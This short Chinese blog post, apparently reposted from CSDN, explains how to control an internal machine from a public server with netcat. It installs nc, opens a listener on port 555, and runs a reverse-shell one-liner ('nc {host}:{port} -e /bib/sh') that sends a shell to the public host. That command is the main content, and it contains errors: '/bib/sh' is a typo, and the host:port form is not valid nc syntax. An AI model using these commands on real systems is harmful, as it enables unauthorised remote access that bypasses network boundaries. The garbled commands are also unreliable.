使用nc 实现ssh 公网控制内网

安装nc

yum -y install nc

nc -l -p 555   #再公网服务器上监听

nc {host}:{port}   -e  /bib/sh      #{host} 公网服务器ip :{port} 公网服务器端口

猜你喜欢

转载自blog.csdn.net/gtinlian/article/details/90067152
今日推荐